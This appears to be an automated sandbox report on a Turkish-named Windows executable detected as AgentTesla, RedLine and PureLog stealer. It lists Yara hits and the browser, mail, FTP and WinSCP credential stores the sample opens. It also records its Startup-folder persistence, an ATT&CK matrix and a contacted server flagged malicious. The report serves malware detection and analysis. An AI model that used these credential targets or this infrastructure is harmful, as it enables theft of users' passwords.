Source: Yara match	File source: 7.2.RegSvcs.exe.27503c6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.2ae0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.4571149713.0000000003694000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.4571149713.00000000036CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3837231570.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.4571149713.00000000036C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3838840579.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.4571149713.00000000036BF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3835842078.000000000270F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3837231570.0000000002B94000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3837231570.0000000002BC7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3837117368.0000000002AE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3840117375.0000000005240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 4852, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 2540, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 7.2.RegSvcs.exe.2ae0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.2ae0ee8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.274f4de.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.3b46458.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.3b93d90.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.274f4de.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.3b93d90.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.5240000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.2ae0ee8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.27503c6.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.3b46458.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.5240000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.3b45570.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.3b45570.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.27503c6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.2ae0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3838840579.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3835842078.000000000270F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3837117368.0000000002AE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3840117375.0000000005240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Yara detected RedLine Stealer

Source: Yara match	File source: 6.2.name.exe.3670000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.name.exe.12a0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3833407043.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3720636618.0000000003670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3833226149.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File opened: C:\FTP Navigator\Ftplist.txt

Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Source: name.exe	Binary or memory string: WIN_81
Source: name.exe	Binary or memory string: WIN_XP
Source: name.exe.0.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: name.exe	Binary or memory string: WIN_XPe
Source: name.exe	Binary or memory string: WIN_VISTA
Source: name.exe	Binary or memory string: WIN_7
Source: name.exe	Binary or memory string: WIN_8

Source: Yara match	File source: 7.2.RegSvcs.exe.2ae0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.2ae0ee8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.274f4de.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.3b46458.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.3b93d90.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.274f4de.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.3b93d90.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.5240000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.2ae0ee8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.27503c6.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.3b46458.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.5240000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.3b45570.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.3b45570.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.27503c6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.2ae0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.4571149713.0000000003694000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3838840579.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3835842078.000000000270F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3837231570.0000000002B94000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3837117368.0000000002AE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3840117375.0000000005240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 4852, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 2540, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 7.2.RegSvcs.exe.2ae0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.2ae0ee8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.274f4de.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.3b46458.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.3b93d90.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.274f4de.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.3b93d90.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.5240000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.2ae0ee8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.27503c6.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.3b46458.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.5240000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.3b45570.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.3b45570.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.27503c6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.2ae0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.4571149713.0000000003694000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.4571149713.00000000036CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3837231570.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.4571149713.00000000036C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3838840579.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.4571149713.00000000036BF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3835842078.000000000270F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3837231570.0000000002B94000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3837231570.0000000002BC7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3837117368.0000000002AE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3840117375.0000000005240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 4852, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 2540, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 7.2.RegSvcs.exe.2ae0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.2ae0ee8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.274f4de.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.3b46458.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.3b93d90.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.274f4de.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.3b93d90.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.5240000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.2ae0ee8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.27503c6.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.3b46458.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.5240000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.3b45570.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.3b45570.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.27503c6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.2ae0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3838840579.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3835842078.000000000270F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3837117368.0000000002AE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3840117375.0000000005240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Yara detected RedLine Stealer

Source: Yara match	File source: 6.2.name.exe.3670000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.name.exe.12a0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3833407043.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3720636618.0000000003670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3833226149.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Code function: 0_2_00A01204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,	0_2_00A01204
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Code function: 0_2_00A01806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	0_2_00A01806
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_01031204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,	6_2_01031204
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_01031806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	6_2_01031806

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	2 Valid Accounts	121 Windows Management Instrumentation	111 Scripting	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	121 Input Capture	1 Account Discovery	Remote Desktop Protocol	2 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	2 Valid Accounts	2 Valid Accounts	2 Obfuscated Files or Information	1 Credentials in Registry	3 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	2 Registry Run Keys / Startup Folder	21 Access Token Manipulation	1 Software Packing	NTDS	48 System Information Discovery	Distributed Component Object Model	121 Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	212 Process Injection	1 DLL Side-Loading	LSA Secrets	241 Security Software Discovery	SSH	3 Clipboard Data	123 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	2 Registry Run Keys / Startup Folder	1 Masquerading	Cached Domain Credentials	221 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Valid Accounts	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	221 Virtualization/Sandbox Evasion	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	21 Access Token Manipulation	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	212 Process Injection	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
F#U0130YAT TEKL#U0130F.exe	47%	ReversingLabs	Win32.Trojan.Strab
F#U0130YAT TEKL#U0130F.exe	39%	Virustotal		Browse
F#U0130YAT TEKL#U0130F.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\directory\name.exe	100%	Joe Sandbox ML

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
mail.aquareklam.com	4%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
mail.aquareklam.com	0%	Avira URL Cloud	safe
http://mail.aquareklam.com	4%	Virustotal		Browse
http://mail.aquareklam.com	0%	Avira URL Cloud	safe
mail.aquareklam.com	4%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
api.ipify.org	104.26.12.205	true	false		high
mail.aquareklam.com	37.247.115.2	true	true	4%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.ipify.org/	false		high
mail.aquareklam.com	true	4%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.ipify.org	RegSvcs.exe, 00000007.00000002.3838840579.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3837231570.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3835842078.000000000270F000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3837117368.0000000002AE0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3840117375.0000000005240000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.4571149713.0000000003650000.00000004.00000800.00020000.00000000.sdmp	false		high
https://account.dyn.com/	RegSvcs.exe, 00000007.00000002.3838840579.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3835842078.000000000270F000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3837117368.0000000002AE0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3840117375.0000000005240000.00000004.08000000.00040000.00000000.sdmp	false		high
https://api.ipify.org/t	RegSvcs.exe, 00000007.00000002.3837231570.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.4571149713.0000000003650000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	RegSvcs.exe, 00000007.00000002.3837231570.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.4571149713.0000000003650000.00000004.00000800.00020000.00000000.sdmp	false		high
http://mail.aquareklam.com	RegSvcs.exe, 00000007.00000002.3837231570.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3837231570.0000000002BD7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.4571149713.00000000036CE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.4571149713.00000000036BF000.00000004.00000800.00020000.00000000.sdmp	false	4%, Virustotal, Browse Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.26.12.205	api.ipify.org	United States		13335	CLOUDFLARENETUS	false
37.247.115.2	mail.aquareklam.com	Turkey		208258	ACCESS2ITNL	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1430788
Start date and time:	2024-04-24 07:18:57 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 26s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	F#U0130YAT TEKL#U0130F.exe renamed because original name is a hash value
Original Sample Name:	FYAT TEKLF.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@10/10@3/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 98% Number of executed functions: 57 Number of non-executed functions: 301
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240s for sample files taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
07:22:29	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs
07:22:30	API Interceptor	122x Sleep call for process: RegSvcs.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.26.12.205	Sonic-Glyder.exe	Get hash	malicious	Stealit	Browse	api.ipify.org/?format=json
	Sky-Beta.exe	Get hash	malicious	Stealit	Browse	api.ipify.org/?format=json
	SecuriteInfo.com.Backdoor.Win32.Agent.myuuxz.13708.17224.exe	Get hash	malicious	Bunny Loader	Browse	api.ipify.org/
	lods.cmd	Get hash	malicious	Remcos	Browse	api.ipify.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
api.ipify.org	New DHL Shipment Document Arrival Notice.pdf.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	hesaphareketi_1.scr.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	DHL Shipping doc.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	104.26.13.205
	purchase order pdf.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
